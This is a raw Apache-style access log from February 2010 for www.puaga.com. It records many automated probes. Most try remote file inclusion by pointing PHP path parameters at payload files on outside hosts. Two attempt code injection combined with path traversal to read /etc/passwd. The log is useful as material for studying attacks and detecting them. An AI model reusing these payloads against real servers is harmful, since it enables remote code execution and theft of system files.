210.127.209.105 - - [24/Feb/2010:06:14:03 -0800] "GET /logs/access_100122.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:14:03 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:14:03 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
209.172.33.230 - - [24/Feb/2010:06:14:30 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [24/Feb/2010:06:14:30 -0800] "GET /logs/access_100218.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [24/Feb/2010:06:14:30 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:14:44 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:14:50 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:15:01 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:06:15:30 -0800] "GET /logs/access_100205.log/index.php?load=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:06:15:30 -0800] "GET /logs/index.php?load=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:06:15:30 -0800] "GET /index.php?load=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.146.255.14 - - [24/Feb/2010:06:15:39 -0800] "GET /logs/access_100202.log/index.php?load=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:15:40 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:15:41 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:15:41 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:16:12 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:16:17 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:16:17 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:16:21 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:16:22 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [24/Feb/2010:06:16:24 -0800] "GET /logs/access_100218.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:16:27 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:16:28 -0800] "GET /logs/access_100202.log//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:16:45 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:16:45 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:16:46 -0800] "GET /logs/access_100126.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:16:46 -0800] "GET /logs/access_100201.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:17:04 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:17:16 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:17:22 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:17:22 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:17:23 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:17:52 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [24/Feb/2010:06:18:05 -0800] "GET /logs/access_100215.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:18:59 -0800] "GET /activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:19:00 -0800] "GET /logs/access_100219.log/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:19:00 -0800] "GET /logs/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:19:01 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:19:17 -0800] "GET /logs/access_100125.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:06:19:17 -0800] "GET /language=0&lang_settings[0][1]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:06:19:17 -0800] "GET /logs/language=0&lang_settings[0][1]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [24/Feb/2010:06:19:17 -0800] "GET /logs/access_100128.log%20%20/language=0&lang_settings[0][1]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:19:44 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:19:52 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:20:27 -0800] "GET /logs/access_100205.log%20%20/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:20:28 -0800] "GET /mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:20:28 -0800] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:20:32 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:20:32 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:06:20:34 -0800] "GET /logs/access_100209.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:06:20:34 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:06:20:34 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:20:37 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:06:20:38 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:06:20:40 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:20:40 -0800] "GET /logs/access_100215.log%20%20/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:20:40 -0800] "GET /mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:20:40 -0800] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [24/Feb/2010:06:20:45 -0800] "GET /logs/access_100121.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:20:46 -0800] "GET /logs/access_100205.log%20%20/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:20:46 -0800] "GET /mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:20:46 -0800] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:20:53 -0800] "GET /activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:20:53 -0800] "GET /logs/access_100219.log/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:20:53 -0800] "GET /logs/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:20:53 -0800] "GET /logs/access_100205.log%20%20/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:05 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:05 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:05 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:24 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:24 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:24 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:25 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:25 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:25 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:21:34 -0800] "GET /logs/access_100203.log%20%20/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:35 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:21:36 -0800] "GET /logs/access_100123.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:21:36 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:21:48 -0800] "GET /logs/access_100201.log/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.152.246 - - [24/Feb/2010:06:22:07 -0800] "GET /logs/access_100218.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.152.246 - - [24/Feb/2010:06:22:07 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.125.152.246 - - [24/Feb/2010:06:22:08 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:22:14 -0800] "GET /logs/access_100125.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:22:26 -0800] "GET /logs/access_100203.log%20%20/mvcw_conver.php?step=1&vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.216.33 - - [24/Feb/2010:06:22:34 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:22:40 -0800] "GET /logs/access_100125.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:22:54 -0800] "GET /activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:22:54 -0800] "GET /logs/access_100219.log%20%20/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:22:54 -0800] "GET /logs/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:22:56 -0800] "GET /logs/access_100219.log%20%20/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:22:56 -0800] "GET /logs/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:22:56 -0800] "GET /activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:23:26 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:23:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:23:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:24:27 -0800] "GET /logs/access_100128.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:24:32 -0800] "GET /logs/access_100201.log%20%20/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [24/Feb/2010:06:24:33 -0800] "GET /logs/access_100201.log%20%20/activecontent.php?vsDragonRootPath=http://thueringen.parfumperle.de/components/com_banners/models/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:24:35 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:24:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:24:55 -0800] "GET /logs/access_100214.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:25:17 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.milsasia.com//data/cms/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:25:18 -0800] "GET /logs/access_100119.log%20%20//include/admin.lib.inc.php?site_path=http://www.milsasia.com//data/cms/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:25:18 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.milsasia.com//data/cms/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:26:24 -0800] "GET /logs/access_100123.log%20%20//include/admin.lib.inc.php?site_path=http://www.milsasia.com//data/cms/idlab1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [24/Feb/2010:06:26:27 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.puaga.com"
